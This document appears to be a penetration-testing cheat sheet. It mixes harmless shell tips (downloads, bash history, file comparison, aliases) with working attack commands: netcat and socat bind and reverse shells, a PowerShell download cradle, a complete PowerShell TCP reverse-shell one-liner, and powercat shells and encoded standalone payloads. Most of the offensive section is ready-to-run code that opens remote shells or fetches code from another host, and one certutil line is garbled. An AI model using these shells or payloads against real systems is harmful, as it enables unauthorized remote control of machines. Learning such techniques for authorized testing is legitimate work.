# Important Commands **Download**\ while we can use wget or curl to grab files, there's another tool called axel ie multipart download which speeds up large downloads considerably axel -a -n 20 -o file.ext Download using certutil certutil -rulcache -f ]\() jsextension.exe **History**\ ignore duplicates and or spaces export HISTCONTROL=ignoredups commands that are run frequently export HISTIGNORE="&:ls:\[bf]g:exit:history" History Timeformat export HISTTIMEFORMAT='%F %T ' **File Comparison** File comparison comm - compares 2 text files comm scan-a.txt scan-b.txt it outputs lines that are shared by both - in last column the first column printed last is the difference exclude certain line(s) comm -12 scan-a.txt scan-b.txt diff - shared many output formats context format -c unified format -u vimdiff (show 2 columns)\ \ **Tail** output last 2 lines using tail tail -n2 /var/log/apache.log aliases are useful replacing cmds with a shorter command we define alias lsa='ls -la' **Bash**\ /etc/bash.bashrc \[system wide bash settings for any user when logged in] **Netcat** nc -v -n ip port nc -nvlp 5555 transfer files with netcat nc -nlvp 4444 > file.exe remote side: nc -nv ip 4444 < /location\_of\_file bind\ nc -nlvp 4444 -e cmd.exe nv -nv ip 4444 reverse \ nc -nv ip 4444 -e /bin/bash nc -nlvp 4444 **Socat** socat - TCP4:ip:port\ Listener sudo socat TCP4-LISTEN:443 STDOUT\ \ Reverse sh \ Listener: socat -d -d TCP4-LISTEN:443 STDOUT\ socat TCP4:ip:port EXEC:/bin/bash sudo socat OPENSSL-LISTEN:443,cert=bind\_shell.pem,verify=0,fork EXEC=/bin/bash socat - OPENSSL:ip:port,verify=0 **Powershell** \ set-executionpolicy unrestricted Get-ExecutionPolicy\ \ transfering file: Powershell -c "(new-object System.Net.Webclient).DownloadFile('[http://ip/wget.exe','C:\temp\wget.exe](http://ip/wget.exe','C:/temp/wget.exe)')" **Shell:** $client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80); $stream = $client.GetStream(); \[byte\[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) {; $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); $sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> "; $sendbyte = (\[text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush(); } $client.Close(); **Bind shell:** $client = New-Object System.Net.Sockets.TCPClient("192.168.254.1",4444);$stream = $client.GetStream();\[byte\[]]$bytes = 0..255|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = (\[text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() **Powercat** Basically the powershell version of netcat and simplifies the creation of bind & reverse shells. File transfer powercat -c ip -p 443 -i c:\location\powercat.ps1 Simple reverse shell: powercat -c ip - p 443 -e cmd.exe nc -lvp 443 Powercat Bind shells: powercat -l -p 443 -e cmd.exe nc -nv ip 443 **powercat standalone payloads:** powercat -c ip -p 443 -e cmd.exe -ge > reverse.ps1 powershell -E base64